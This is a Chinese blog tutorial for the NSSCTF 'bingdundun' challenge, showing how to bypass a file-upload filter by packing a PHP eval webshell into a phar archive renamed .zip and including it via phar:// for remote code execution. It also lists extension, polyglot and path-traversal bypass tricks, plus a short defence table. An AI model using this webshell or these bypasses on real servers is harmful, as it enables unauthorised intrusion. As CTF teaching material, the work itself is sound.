当前位置：首页 > article >正文

CTF实战：手把手教你用phar伪协议绕过NSS靶场文件上传限制

article 2026/5/25 9:32:17

CTF实战手把手教你用phar伪协议绕过NSS靶场文件上传限制在网络安全竞赛和渗透测试中文件上传漏洞一直是高频考点。今天我们将深入探讨如何利用PHP的phar伪协议绕过NSSCTF平台bingdundun题目的文件上传限制实现远程代码执行(RCE)。不同于简单的Writeup本教程将从原理到实践带你完整走通整个攻击链。1. 环境分析与漏洞定位首先访问题目链接我们会看到一个文件上传界面提示只能上传图片或者压缩包。这种限制在CTF和实际渗透中非常常见通常通过检查文件扩展名或MIME类型来实现。关键发现点URL中存在GET参数bingdundunindex测试发现参数值会被自动追加.php后缀上传功能仅允许图片(.jpg,.png等)或压缩包(.zip,.rar等)通过简单测试我们可以推测后台可能存在文件包含漏洞。当传入?bingdundunfilename时服务器会尝试包含filename.php文件。这为我们后续利用phar伪协议提供了可能。注意在实际测试中建议先尝试上传正常图片观察服务器返回的存储路径和文件名处理方式这对后续攻击很有帮助。2. phar伪协议核心原理phar(PHP Archive)是PHP的一种打包格式类似于Java的JAR。从PHP 5.3开始默认支持.phar文件操作。phar伪协议最强大的特性在于它能解析多种压缩格式而不仅限于.phar后缀。phar文件结构解析Stub文件头必须包含__HALT_COMPILER();语句Manifest描述压缩内容包含文件元数据(可序列化)File Contents实际压缩的文件内容Signature(可选)文件签名与其他压缩协议(zip://, bzip2://等)相比phar://有以下优势支持更多压缩格式不严格依赖文件扩展名可以触发反序列化操作(通过metadata)3. 构造恶意phar文件虽然题目允许上传.zip文件但我们将演示更通用的phar文件构造方法。以下是创建恶意phar文件的PHP脚本?php $phar new Phar(exploit.phar); $phar-startBuffering(); $phar-setStub(?php __HALT_COMPILER(); ?); // 添加包含恶意代码的文件 $phar-addFromString(shell.php, ?php eval($_GET[cmd]); ?); // 可以添加metadata用于反序列化攻击 // $phar-setMetadata([key value]); $phar-stopBuffering(); ?执行此脚本后会生成exploit.phar文件。我们可以直接上传它或者重命名为.zip扩展名以绕过上传限制。关键技巧即使重命名为.jpg只要内容符合phar格式仍可被解析最小phar文件只需包含stub和至少一个文件可以通过php -d phar.readonly0 script.php禁用只读模式4. 完整攻击链实现现在我们将各个步骤串联起来实现完整的攻击流程上传阶段将生成的phar文件重命名为exploit.zip上传到服务器记下返回的存储路径如/uploads/exploit.zip文件包含触发构造URL?bingdundunphar://uploads/exploit.zip/shell服务器会解析为phar://uploads/exploit.zip/shell.php由于phar协议会自动解压并访问内部文件我们的shell.php将被执行RCE实现访问包含后的URL附加命令参数cmdsystem(ls);服务器将执行我们注入的PHP代码常见问题排查如果返回空白可能是phar文件构造有问题检查stub格式如果报错not a valid phar archive尝试重新生成或使用zip格式确保内部文件路径与包含时指定的路径一致5. 防御措施与进阶思考了解攻击手段后我们更应该思考如何防御此类漏洞。以下是几种有效的防护方案防御措施实现方式有效性文件内容检查使用getimagesize()验证图片真实性中重命名上传文件生成随机文件名避免目录遍历高禁用危险协议在php.ini中限制phar://等协议高权限隔离上传目录禁止执行PHP高在更复杂的场景中phar协议还可以与反序列化漏洞结合通过精心构造的metadata实现更深入的攻击。这要求我们不仅要关注文件上传本身还要注意整个应用的处理流程。6. 其他压缩协议对比除了phar://PHP还支持多种压缩流协议它们在CTF中各有应用场景协议对比表协议所需扩展支持格式自动解压反序列化风险phar://内置phar, zip是高zip://zipzip是无bzip2://bz2bz2是无zlib://zlibgz是无选择协议时zip://通常是最兼容的方案而phar://功能最强大但风险也最高。在实际渗透测试中可以依次尝试这些协议寻找可用的攻击面。7. 实战技巧与经验分享在真实CTF比赛和渗透测试中有几点经验值得分享文件扩展名绕过尝试.phar、.zip、.jpg等多种扩展名测试大小写变种(.pHp、.PhAr)使用双扩展名(exploit.jpg.php)内容混淆技术在phar文件中添加真实的图片数据使用polyglot技术构造既是图片又是phar的文件通过注释添加垃圾数据干扰检测路径遍历技巧尝试绝对路径包含phar:///var/www/uploads/exploit.zip测试相对路径phar://../uploads/exploit.zip结合目录穿越实现更灵活的包含遇到上传限制时不要轻易放弃。多角度思考、全面测试每个可能的入口点往往能在看似严密的防御中找到突破口。

CTF实战：手把手教你用phar伪协议绕过NSS靶场文件上传限制

相关文章：

CTF实战：手把手教你用phar伪协议绕过NSS靶场文件上传限制

Spring Cloud微服务里，如何用XXL-JOB搞定订单15分钟未支付自动关闭？

LVGL事件处理实战：从按钮点击到复杂手势，手把手教你写响应式UI回调

从主题到视频：Pixelle-Video如何用AI重构你的内容创作流程

Windows流媒体服务器终极指南：5分钟部署SRS高性能视频传输平台

GASShooter伤害计算与GameplayEffectContext：自定义伤害类型与爆头机制终极指南 [特殊字符]

如何快速搭建Windows虚拟路由器：VirtualRouter完整使用指南

展锐RM500U 5G CPE固件升级避坑指南：为什么你的QFlash总卡在‘开始下载’？

如何获取VMware Workstation Pro 17免费许可证密钥：完整实践指南

如何利用LayerPlayer快速掌握iOS动画开发技巧

3个实用技巧：用SMUDebugTool解决AMD Ryzen常见硬件问题

June主题定制教程：从模板修改到样式定制的完整解决方案

终极指南：如何用罗技鼠标宏实现PUBG完美压枪控制

城通网盘解析工具：3分钟获取直连地址的完整高效解决方案

VMware Workstation Pro 17 免费许可证密钥终极指南：快速获取与完整安装教程

从红宝石到光纤：固体激光器家族里，谁才是工业加工界的‘六边形战士’？

为什么你的PS手柄在Windows上无法畅玩游戏？3步解锁完美兼容方案

别再死记硬背了！用COMSOL 5.6搞定声学建模，从房间特征频率到完美匹配层（PML）实战避坑

旧安卓手机别扔！用Termux+LXC把它变成一台Ubuntu Docker服务器（保姆级避坑指南）

JMeter临界部分控制器正确用法与避坑指南

Selenium自动化绕过反爬：彻底清除webdriver指纹的三层策略

深度掌握AMD Ryzen性能调优：SMUDebugTool硬件调试终极指南

哔哩漫游X：全面解锁B站功能的终极ReVanced增强模块

如何通过Marlin固件配置解决3D打印常见问题：终极完整指南

3步快速上手：AMD Ryzen性能调试工具SMUDebugTool完全指南

GitHub中文界面终极指南：免费脚本让英文GitHub秒变中文

智慧树自动刷课插件终极指南：3步安装教程，彻底告别手动刷课烦恼！

从一次PR被拒说起：我是如何用Git Upstream优雅同步Gitee Fork仓库的

为什么iOS越狱依然充满魔力？揭秘现代越狱技术的创新突破

TradingAgents-CN：构建智能金融分析系统的5大关键模块解析